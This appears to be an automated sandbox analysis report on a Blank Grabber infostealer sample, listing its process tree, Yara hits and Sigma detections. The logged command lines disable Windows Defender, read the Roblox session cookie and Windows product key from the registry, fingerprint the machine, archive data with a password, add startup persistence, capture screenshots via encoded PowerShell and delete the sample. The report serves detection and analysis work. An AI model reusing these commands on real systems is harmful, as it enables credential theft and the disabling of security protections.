            • cvtres.exe (PID: 7352 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESED03.tmp" "c:\Users\user\AppData\Local\Temp\bifucm0t\CSCB2EB15F711B84CFFA3556DECAB136738.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • cmd.exe (PID: 2588 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 4268 cmdline: tree /A /F MD5: 7E896B29B309DE74A72DEC7D59715EFD)
      • cmd.exe (PID: 5132 cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 8004 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • cmd.exe (PID: 5408 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • getmac.exe (PID: 2916 cmdline: getmac MD5: 31874C37626D02373768F72A64E76214)
      • cmd.exe (PID: 7432 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 5868 cmdline: tree /A /F MD5: 7E896B29B309DE74A72DEC7D59715EFD)
      • cmd.exe (PID: 5312 cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 6708 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • cmd.exe (PID: 8032 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 8020 cmdline: tasklist /FO LIST MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • cmd.exe (PID: 3624 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 5808 cmdline: tree /A /F MD5: 7E896B29B309DE74A72DEC7D59715EFD)
      • cmd.exe (PID: 7992 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7592 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 7588 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 6120 cmdline: tree /A /F MD5: 7E896B29B309DE74A72DEC7D59715EFD)
      • cmd.exe (PID: 7676 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8156 cmdline: tree /A /F MD5: 7E896B29B309DE74A72DEC7D59715EFD)
      • cmd.exe (PID: 4948 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8144 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 6384 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe a -r -hp"grabber" "C:\Users\user\AppData\Local\Temp\CoY55.zip" *" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rar.exe (PID: 2792 cmdline: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe a -r -hp"grabber" "C:\Users\user\AppData\Local\Temp\CoY55.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
      • cmd.exe (PID: 6476 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 2672 cmdline: wmic os get Caption MD5: E2DE6500DE1148C7F6027AD50AC8B891)
      • cmd.exe (PID: 4464 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 2032 cmdline: wmic computersystem get totalphysicalmemory MD5: E2DE6500DE1148C7F6027AD50AC8B891)
      • cmd.exe (PID: 2936 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 4468 cmdline: wmic csproduct get uuid MD5: E2DE6500DE1148C7F6027AD50AC8B891)
      • cmd.exe (PID: 1744 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7552 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 2852 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 6472 cmdline: wmic path win32_VideoController get name MD5: E2DE6500DE1148C7F6027AD50AC8B891)
      • cmd.exe (PID: 2740 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7480 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 2180 cmdline: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\KpHYfxnJs6.exe"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 884 cmdline: ping localhost -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\_MEI73202\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000003.2878432052.000000000838F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
      00000004.00000002.2886083384.0000000007480000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        00000000.00000003.2051169917.00000000050F4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
          00000000.00000003.2051169917.00000000050F6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
            00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
              Click to see the 7 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\KpHYfxnJs6.exe", ParentImage: C:\Users\user\Desktop\KpHYfxnJs6.exe, ParentProcessId: 7732, ParentProcessName: KpHYfxnJs6.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'", ProcessId: 7964, ProcessName: cmd.exe
              Sigma detected: Powershell Defender Disable Scan Feature
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\KpHYfxnJs6.exe", ParentImage: C:\Users\user\Desktop\KpHYfxnJs6.exe, ParentProcessId: 7732, ParentProcessName: KpHYfxnJs6.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 7972, ProcessName: cmd.exe
              Sigma detected: Rar Usage with Password and Compression Level
              Source: Process startedAuthor: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe a -r -hp"grabber" "C:\Users\user\AppData\Local\Temp\CoY55.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe a -r -hp"grabber" "C:\Users\user\AppData\Local\Temp\CoY55.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\KpHYfxnJs6.exe", ParentImage: C:\Users\user\Desktop\KpHYfxnJs6.exe, ParentProcessId: 7732, ParentProcessName: KpHYfxnJs6.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe a -r -hp"grabber" "C:\Users\user\AppData\Local\Temp\CoY55.zip" *", ProcessId: 6384, ProcessName: cmd.exe
              Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
              Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\SysWOW64\wbem\WMIC.exe, SourceProcessId: 6472, StartAddress: 7574D700, TargetImage: C:\Windows\SysWOW64\cmd.exe, TargetProcessId: 6472
              Sigma detected: Suspicious Encoded PowerShell Command Line
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Sigma detected: Suspicious Ping/Del Command Combination
              Source: Process startedAuthor: Ilya Krestinichev: Data: Command: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\KpHYfxnJs6.exe"", CommandLine: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\KpHYfxnJs6.exe"", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\KpHYfxnJs6.exe", ParentImage: C:\Users\user\Desktop\KpHYfxnJs6.exe, ParentProcessId: 7732, ParentProcessName: KpHYfxnJs6.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\KpHYfxnJs6.exe"", ProcessId: 2180, ProcessName: cmd.exe
              Sigma detected: Suspicious PowerShell Encoded Command Patterns
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Sigma detected: Suspicious Startup Folder Persistence
              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\KpHYfxnJs6.exe, ProcessId: 7732, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAA